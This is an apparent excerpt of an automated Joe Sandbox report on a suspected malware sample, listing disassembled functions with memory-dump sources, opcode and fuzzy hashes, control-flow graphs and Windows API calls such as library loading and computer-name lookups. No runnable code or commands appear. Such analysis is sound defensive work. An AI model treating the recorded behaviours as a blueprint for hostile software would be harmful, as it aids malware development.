                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ,-
                                                                                                                                                                                                                                                                • API String ID: 0-1027024164
                                                                                                                                                                                                                                                                • Opcode ID: 7a4140848d33ec0c66c937f08661c772cc61a402755d5ad827e3fd3009954760
                                                                                                                                                                                                                                                                • Instruction ID: 853ec9298601950d320b66fe70d2ae791381d07f401d9abb64190c857c8d86fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a4140848d33ec0c66c937f08661c772cc61a402755d5ad827e3fd3009954760
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F2128A1A153008BC7149F29CC52527B7B1EF82365F458629F4869B3A1F7788D05CB96
                                                                                                                                                                                                                                                                Function 00420340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 426d8e085acdbfdf34e08a488eca5c7b0b51ab18019563ed16b228a4192a02db
                                                                                                                                                                                                                                                                • Instruction ID: 803dc71210510a0967e63136f713fac6db8df398c5f066c67d8b3b77b28d3e7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 426d8e085acdbfdf34e08a488eca5c7b0b51ab18019563ed16b228a4192a02db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD3101716083048BC314DF58E8C266FBBE4EBC5364F54893DEA9883391D739D848CB9A
                                                                                                                                                                                                                                                                Function 00420460 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: d065752c6042cb11fb3c62e8a1918ab874b88cc3118cd5a882a217dddd4e405d
                                                                                                                                                                                                                                                                • Instruction ID: fa62e72709a6c42423123368e36c02e5126187060d5976f5c8ba85c5b7f3712b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d065752c6042cb11fb3c62e8a1918ab874b88cc3118cd5a882a217dddd4e405d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C06116357043119BD714AF18D89062FB7E2EFC5710F59852EE98587392EB34DCA1C78A
                                                                                                                                                                                                                                                                Function 0041C5A0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: e7c2f92206059179efab385a397b42f52003f86d8d4e6dd01d3fc4dfd0f32cba
                                                                                                                                                                                                                                                                • Instruction ID: 319856988dd1a57a29795d5bc9e43cb07c95d3261c2aed006f31558638fa2d4b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7c2f92206059179efab385a397b42f52003f86d8d4e6dd01d3fc4dfd0f32cba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68517875A483054BD728AF28CC8067FB7D2ABD5310F18893EE4D597391E7359C828B8A
                                                                                                                                                                                                                                                                Function 003ECC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                                                                                                                • Opcode ID: 2e32d949b3c10a750230b3f4e81b58b8ae8dca7ef725f37d2ae713ba6cc84dfd
                                                                                                                                                                                                                                                                • Instruction ID: d4e1da43e52a36c6dadafef708c3a79a0a716e685fa308b6061a69d0051dc7ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e32d949b3c10a750230b3f4e81b58b8ae8dca7ef725f37d2ae713ba6cc84dfd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19310DEAF0029457E9167B232C53A7F21574BD0718F08113DF50B2A3C3ED69F916969B
                                                                                                                                                                                                                                                                Function 003E8A50 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                                                • Instruction ID: 4aff6a420962315c1bb2386fa1bae15e791db8de6ca6b9c64bb4578cc011e769
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C21B337A627184BD3108E55DCC87917761E7D932CF3E86B889249F3D2C97BA91386C0
                                                                                                                                                                                                                                                                Function 003E9D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1101 3e9d1e-3e9d34 1102 3e9d40-3e9d52 1101->1102 1102->1102 1103 3e9d54-3e9d7e 1102->1103 1104 3e9d80-3e9d92 1103->1104 1104->1104 1105 3e9d94-3e9e13 LoadLibraryExW call 41d960 1104->1105 1108 3e9e20-3e9e32 1105->1108 1108->1108 1109 3e9e34-3e9e5e 1108->1109 1110 3e9e60-3e9e72 1109->1110 1110->1110 1111 3e9e74-3e9e80 LoadLibraryExW call 41d960 1110->1111 1113 3e9e85-3e9e98 1111->1113
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 003E9D98
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 003E9E78
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                                • String ID: CKG
                                                                                                                                                                                                                                                                • API String ID: 1029625771-1990764662
                                                                                                                                                                                                                                                                • Opcode ID: 3219ab1f29a2a99b27e6e7dbc03110a4eca68afc3eb672adb98424600217b18c
                                                                                                                                                                                                                                                                • Instruction ID: 313b519d7a703ec4109b2b2b29578f2d682ec1631726d2a01df330b1dadab2e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3219ab1f29a2a99b27e6e7dbc03110a4eca68afc3eb672adb98424600217b18c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 634123B4E003509FE7259F789DC2A9A7F71EB06324F41529DD8902F3E2C635540ACBE6
                                                                                                                                                                                                                                                                Function 0040D7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1114 40d7ee-40d7f3 1115 40d813-40d819 1114->1115 1116 40d7f5-40d7f9 1114->1116 1118 40d896-40dbfb FreeLibrary call 41fe00 1115->1118 1117 40d800-40d809 1116->1117 1117->1117 1119 40d80b-40d80e 1117->1119 1123 40dc00-40dc12 1118->1123 1119->1118 1123->1123 1124 40dc14-40dc19 1123->1124 1125 40dc1b-40dc1f 1124->1125 1126 40dc2d 1124->1126 1127 40dc20-40dc29 1125->1127 1128 40dc30-40dc72 GetComputerNameExA 1126->1128 1127->1127 1129 40dc2b 1127->1129 1129->1128
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D898
                                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0040DC43
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                                • Opcode ID: b6ab19caaf40500aef899b089e815be7ad57b35883dc5a9680875e51de53687f
                                                                                                                                                                                                                                                                • Instruction ID: d1ef82a9aa469d3774aeb9fbe97a897c10ce9c4dabdfa801706d8698188244d8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6ab19caaf40500aef899b089e815be7ad57b35883dc5a9680875e51de53687f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D82128715047428FEB218F25C850727BFE1AF57300F18C6AAC4D69B3D6D6389847CB55
                                                                                                                                                                                                                                                                Function 003EEF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 003EF09D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a35c0683f494b1d6612ae94b0941688379b9fa84bc61cb0b06a1905a3233b81
                                                                                                                                                                                                                                                                • Instruction ID: 5fcc647c95aedc99aeef206629772eeb067026c73d1b982d1e7fa05dd79762ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a35c0683f494b1d6612ae94b0941688379b9fa84bc61cb0b06a1905a3233b81
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D341D8B4910B40AFD370EF3D994B7137EB8AB05250F504B1EF9EA866D4E231A4198BD7
                                                                                                                                                                                                                                                                Function 0040D7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0040DD03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
